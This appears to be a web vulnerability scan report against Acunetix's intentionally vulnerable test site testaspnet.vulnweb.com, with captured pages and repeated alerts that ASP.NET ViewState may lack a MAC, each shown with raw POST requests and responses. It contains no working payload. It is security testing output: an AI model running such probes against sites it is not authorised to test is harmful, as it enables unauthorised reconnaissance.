theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" 
cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. 
Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. 
What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. 
Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next 
month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Solution
Ensure the MAC is set for all pages on this website.
POST http://testaspnet.vulnweb.com/about.aspx
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/about.aspx
Content-Length: 1027
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1027 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3D
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 14467
Response body (14467 bytes)
Solution
Ensure the MAC is set for all pages on this website.
POST http://testaspnet.vulnweb.com/default.aspx
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (388 bytes)
POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com
Content-Length: 1025
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1025 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 12371
Response body (12371 bytes)
Solution
Ensure the MAC is set for all pages on this website.
POST http://testaspnet.vulnweb.com/login.aspx
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/login.aspx
Content-Length: 1197
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1197 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 13281
Response body (13281 bytes)
Solution
Ensure the MAC is set for all pages on this website.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (455 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Content-Length: 6567
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (6567 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 22784
Response body (22784 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" 
cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. 
Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. 
Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" 
style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td 
